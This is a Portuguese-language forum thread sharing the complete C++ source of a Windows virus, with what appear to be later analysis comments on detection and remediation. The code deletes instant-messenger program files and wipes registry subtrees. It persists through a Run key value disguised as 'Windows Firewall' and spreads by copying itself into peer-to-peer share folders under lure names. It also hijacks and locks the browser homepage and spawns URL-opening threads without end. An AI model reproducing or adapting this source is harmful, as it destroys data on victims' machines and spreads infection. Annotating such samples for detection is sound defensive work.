Pequeno vírus.

Started by Anonymous, 08 de June , 2006, 02:36:21 PM


Anonymous

Pequeno vírus:

load.h

/*LOAD.H*/
#include <stdio.h>
#include <stdlib.h>
#include <fstream>
using namespace std;

// Analysis note: payload helpers that break installed instant-messaging
// clients by deleting files from their install directories. Every path is
// hard-coded under C:\Program Files, so each one is a concrete file-deletion
// indicator when reviewing endpoint telemetry for this sample.
// No remove()/system() return value is checked, so each helper carries on
// silently whether or not the target exists. The "(works)" remarks are the
// original author's claims and are not verified here.
namespace system_chat                 //deletes instant chat
{
// Deletes eight DLLs from the MSN Messenger install directory, then clears
// the console via system("cls").
void del_msn() //disables msn messenger (works)
{
remove("C:\\Program Files\\MSN Messenger\\wmv9vcm.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcdll.dll");
remove("C:\\Program Files\\MSN Messenger\\rtcres.dll");
remove("C:\\Program Files\\MSN Messenger\\msidcrl.dll");
remove("C:\\Program Files\\MSN Messenger\\msgrapp.dll");
remove("C:\\Program Files\\MSN Messenger\\msgsc.dll");
remove("C:\\Program Files\\MSN Messenger\\msgslang.dll");
remove("C:\\Program Files\\MSN Messenger\\psmsong.dll");
system("cls");
}             
// Removes three files under Common Files\AOL and then issues three rmdir
// commands. Each system() call goes through the command interpreter, so the
// rmdir and cls invocations appear as child shell processes of this binary in
// process-creation logs.
void del_aim()//fucks a bit around with AOL. (works)
{
remove("C:\\Program Files\\Common Files\\AOL\\eehelper.ddl");
remove("C:\\Program Files\\Common Files\\AOL\\1144979710\\ee\\AOLSvcMgr.dll");
remove("C:\\Program Files\\Common Files\\AOL\\xprt5.dll");
system("rmdir C:\\Program Files\\AOL");
system("rmdir C:\\Program Files\\AOD");
system("rmdir C:\\Program Files\\Common Files\\AOL\\1144979710");//overkill
system("cls");
}       
// Deletes the mIRC executable and an entry named "servers" in the mIRC
// install directory.
void del_mirc()                      //disables mIRC(works)
{
remove("C:\\Program Files\\mIRC\\mirc.exe");
remove("C:\\Program Files\\mIRC\\servers");
system("cls");             
}         
// Deletes three DLLs from the Gaim install directory.
void del_gaim()                       //disables Gaim (works)
{
remove("C:\\Program Files\\Gaim\\gaim.dll"); 
remove("C:\\Program Files\\Gaim\\ssl3.dll");
remove("C:\\Program Files\\Gaim\\softokn3.dll");
system("cls");               
}                             
}



// Recursively deletes a registry key together with all of its subkeys.
//
// hKeyRoot  - open root key (the callers in this listing pass HKEY_CURRENT_USER).
// lpSubKey  - path of the key to delete. The buffer is modified in place: a
//             trailing backslash and child key names are appended while
//             recursing, so it must be writable and have spare capacity.
//             RegDelnode() supplies such a buffer. Assumes a non-empty string,
//             because the character before the terminator is inspected.
// Returns TRUE when the key was deleted or did not exist, FALSE otherwise.
//
// NOTE(review): the structure resembles the widely published Windows SDK
// sample for deleting a key with subkeys - confirm before treating this
// function as specific to this sample. In this listing it is only the
// destructive primitive behind the registry wipes performed in main().
BOOL RegDelnodeRecurse (HKEY hKeyRoot, LPTSTR lpSubKey)
{
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    // First, see if we can delete the key without having
    // to recurse.

    lResult = RegDeleteKey(hKeyRoot, lpSubKey);

    if (lResult == ERROR_SUCCESS)
        return TRUE;

    // The direct delete failed, so open the key read-only in order to
    // enumerate its children.
    lResult = RegOpenKeyEx (hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS)
    {
        // A missing key is reported as success: there is nothing to delete.
        if (lResult == ERROR_FILE_NOT_FOUND) {
            printf("Key not found.\n");
            return TRUE;
        }
        else {
            printf("Error opening key.\n");
            return FALSE;
        }
    }

    // Check for an ending slash and add one if it is missing.

    lpEnd = lpSubKey + lstrlen(lpSubKey);

    if (*(lpEnd - 1) != TEXT('\\'))
    {
        *lpEnd =  TEXT('\\');
        lpEnd++;
        *lpEnd =  TEXT('\0');
    }

    // Enumerate the keys

    // Index 0 is requested every time: each successful recursive delete
    // removes the first child, so the next child moves into position 0.
    dwSize = MAX_PATH;
    lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
                           NULL, NULL, &ftWrite);

    if (lResult == ERROR_SUCCESS)
    {
        do {
            // Append the child name after the trailing backslash and recurse
            // on the extended path.
            lstrcpy (lpEnd, szName);
            if (!RegDelnodeRecurse(hKeyRoot, lpSubKey)) {
                // Stop on the first child that cannot be removed; otherwise
                // the same index-0 child would be returned again.
                break;
            }

            dwSize = MAX_PATH;

            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,
                                   NULL, NULL, &ftWrite);

        } while (lResult == ERROR_SUCCESS);
    }

    // Strip the trailing backslash so lpSubKey names the parent key again.
    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey (hKey);

    // Try again to delete the key.

    lResult = RegDeleteKey(hKeyRoot, lpSubKey);

   if (lResult == ERROR_SUCCESS)
        return TRUE;

    return FALSE;
}//My balls hurt >:O <:O NIXON ROCK ON DUDE =/ >?<


// Entry point for recursive key deletion: copies lpSubKey into a local
// scratch buffer of 2 * MAX_PATH characters and hands that buffer to
// RegDelnodeRecurse(), which extends the path in place while descending.
// lstrcpy() performs no length check, so lpSubKey is assumed to fit in the
// buffer; every caller in this listing passes a short string literal.
// Returns the result of RegDelnodeRecurse().
BOOL RegDelnode (HKEY hKeyRoot, LPTSTR lpSubKey)
{
    TCHAR szDelKey[2 * MAX_PATH];

    lstrcpy (szDelKey, lpSubKey);
    return RegDelnodeRecurse(hKeyRoot, szDelKey);
}

// Analysis note: overwrites the current user's Internet Explorer start page
// and writes the policy value that controls whether the home page can be
// changed.
//
// site - string written as the new start page.
// lock - true writes 1 to the policy value, false writes 0.
//
// Registry values written (both under HKEY_CURRENT_USER):
//   Software\Microsoft\Internet Explorer\Main                      "Start Page" (REG_SZ)
//   Software\Policies\Microsoft\Internet Explorer\Control Panel    "HomePage"   (REG_DWORD)
// Detection: set-value events on these two values from a process that is not
// the browser or a management tool. Remediation: restore "Start Page" and
// remove or zero the "HomePage" policy value.
// No return code is checked, so a failed open or write goes unnoticed.
void hijack_homepage(char* site, bool lock)
{
HKEY hKey1;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",1,KEY_SET_VALUE,&hKey1 );
RegSetValueEx(hKey1, "Start Page",1,REG_SZ,(const unsigned char*)site,MAX_PATH);
RegCloseKey(hKey1);
// Translate the bool into the DWORD stored in the policy value.
DWORD i;
if (lock)
{
  i = 1;
}else i = 0;
HKEY hKey2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel",1,KEY_SET_VALUE,&hKey2 );
RegSetValueEx(hKey2, "HomePage",1,REG_DWORD,(BYTE*)&i,sizeof(i));
RegCloseKey(hKey2);
}

---------------------------
main.cpp
---------------------------

#include <cstdlib>
#include <iostream>
#include <windows.h>
#include <string.h>
#include <fstream>

#include "load.h"

//******************************************************************************
//                                                                            //                                                                           
//                         DEMONSTRATION OF A VIRII                           //                                                                             
//                                                                            //
//                                   BY                                       //
//                                                                            //
//                               Nerve                                         //
//----------------------------------------------------------------------------//
//                                                                            //
//         For any question you can contact me at  nerve@gmail.com            //
//                                                                            //
//                                                                            //
//                            ~~EDUCATIONAL ONLY~~                            //
//                                                                            // 
//******************************************************************************

using namespace std;

// Declared here but neither defined nor called anywhere in the listing shown.
void DelaySecs(int secs);

// Thread entry point used by the endless CreateThread loop in main().
// Each invocation asks the shell to "open" the hard-coded URL with show
// command 1, then returns 0. The LPVOID thread argument is ignored.
// Analysis note: the URL is a network/browser-launch indicator for this sample.
ULONG WINAPI OurFirstThread(LPVOID)
{
ShellExecute(0,"open","www.rohitab.com",NULL,NULL,1);

return(0);
}

// Forward declaration: reg() is defined after main() in this file.
void reg(void);

// These two are already defined in load.h, which is included above, so the
// redeclarations are redundant.
BOOL RegDelnodeRecurse(HKEY hKeyRoot, LPTSTR lpSubKey);
void hijack_homepage(char* site, bool lock);
   
// Analysis note: entry point of the sample. In order, it
//   1. detaches from the console and installs persistence through reg();
//   2. deletes several HKEY_CURRENT_USER\Control Panel subtrees;
//   3. deletes instant-messenger files through the system_chat helpers;
//   4. copies <system directory>\LSD.exe into four peer-to-peer share folders
//      under lure file names;
//   5. creates marker files in the All Users Start Menu "Programs" folder;
//   6. rewrites the Internet Explorer start page and sets the lock policy value;
//   7. loops forever creating threads that each open a URL.
// Every hard-coded path, file name and registry key below is usable as an
// indicator when triaging a host. Results of the API calls are not checked
// (bSuccess is assigned but never read).
int main()
{
// Note: the local array named `system` shadows the C library function of the
// same name inside main().
char system[100];
char pathtofile[100];

FreeConsole();//get rid of the console window :-0
// Persistence first: reg() drops the copy and writes the Run value.
reg();

// pathtofile receives the running executable's path but is not used again in
// main(); `system` becomes <system directory>\LSD.exe, the copy made by reg().
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,"\\LSD.exe");

//******************************************************************************
//Deletes various registry keys
//******************************************************************************

// Each call removes the named key and all of its subkeys for the current user.
BOOL bSuccess;
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DFlyingObj");
    bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.3DPipes");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Bezier");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Marquee");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Mystify");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Screen Saver.Stars");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Sound");
   bSuccess = RegDelnode(HKEY_CURRENT_USER, "Control Panel\\Printers");
 
//******************************************************************************
// Disable some instant messengers and Other Payloads
//******************************************************************************

system_chat::del_msn();
system_chat::del_gaim();
system_chat::del_mirc();
system_chat::del_aim();

// Propagation through file sharing: the dropped LSD.exe is copied into the
// share folders of four peer-to-peer clients under names that imitate
// popular downloads. The last argument 0 (bFailIfExists = FALSE) lets an
// existing file be overwritten.
// Detection: executables with these names in P2P share folders, identical in
// content to <system directory>\LSD.exe.
CopyFile(system,"C:\\program files\\Morpheus\\My Shared Folder\\Vista_theme_pack.exe",0);
CopyFile(system,"C:\\program files\\Grokster\\My Grokster\\San Andreas.exe",0);
CopyFile(system,"C:\\program files\\eMule\\Incoming\\steam_down.exe",0);
CopyFile(system,"C:\\program files\\limewire\\Shared\\Limewire_pro.exe",0);

// Each stream is opened and closed without writing, which leaves five empty
// files with a .jpg extension in the All Users Start Menu "Programs" folder.
ofstream a_file9("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Hell.jpg");
  a_file9.close();
ofstream a_file4("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PACKET_MONKEYS.jpg");
  a_file4.close();
  ofstream a_file5("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\NERVE.jpg");
  a_file5.close();
  ofstream a_file96("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\MATRIX.jpg");
  a_file96.close();
  ofstream a_file95("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\HARMONEY.jpg");
  a_file95.close();



// Writes a taunt text file to the same folder when the file can be opened.
ofstream hi("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\PWN.txt");
if(hi.is_open())
{
hi          << "You Got Owned!!\n\n"<< endl
         << "GET LINUX MOTHA FUCKA\n" << endl;     
      }
     
hi.close();

//******************************************************************************
//Changes Homepage
//******************************************************************************

// Second argument 1 converts to lock == true, so the policy value is set to 1.
hijack_homepage("www.rohitab.com",1); 

//******************************************************************************
// Browser spammer
//******************************************************************************

Sleep(2000);//Wait for 2000ms

// Unbounded loop: a new thread is created on every iteration and its handle
// is discarded, so the process keeps accumulating threads and URL-open
// requests until it is terminated or resources run out.
// Detection: one process with a rapidly growing thread count and repeated
// shell "open" requests for the same URL. Terminating the process stops the
// loop, but the Run value written by reg() starts it again unless removed.
for (;;)
{
unsigned long ThreadId;
CreateThread(NULL,0,OurFirstThread,0,0,&ThreadId);
}
//exit Da suxor
//
    // Unreachable: the loop above never exits.
    return 0;
}

// Analysis note: persistence routine, called first thing from main().
// It copies the running executable to <system directory>\LSD.exe (the third
// CopyFile argument `false` allows overwriting an existing file) and then
// registers that path under the machine-wide Run key so it is launched at logon:
//   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
//   value name "Windows Firewall" (REG_SZ) -> <system directory>\LSD.exe
// The value name imitates a legitimate Windows component.
// Detection: a Run value named "Windows Firewall" that points at LSD.exe, and
// the creation of LSD.exe in the system directory. Writing to either location
// typically requires administrative rights.
// Remediation: delete the Run value and the dropped file.
// No return code is checked, so failures are silent.
void reg(void)
{
char system[MAX_PATH];

char pathtofile[MAX_PATH];

// A NULL module handle refers to the current executable, so pathtofile holds
// this program's own path.
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,"\\LSD.exe");

CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows Firewall",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
}

Anonymous

PS: Me distraí e postei esse vírus no lugar errado, era pra ser na ala C++, se alguém puder transferir de lugar agradeço.

Shady

Qual é a fonte, pyro?

 * ponto.


Mundus Vult Decipi

Anonymous

Um amigo meu da Holanda intitulado Freak me passou pelo MSN, ele afirma que a autoria é do irmão dele, então preferi nem mencionar fonte.
Mas a fonte é: Irmão de um cara na Holanda chamado Freak.

Anonymous


Skayler

@Shadows

PyroMaker está banido.

Leia o código e você terá uma explicação.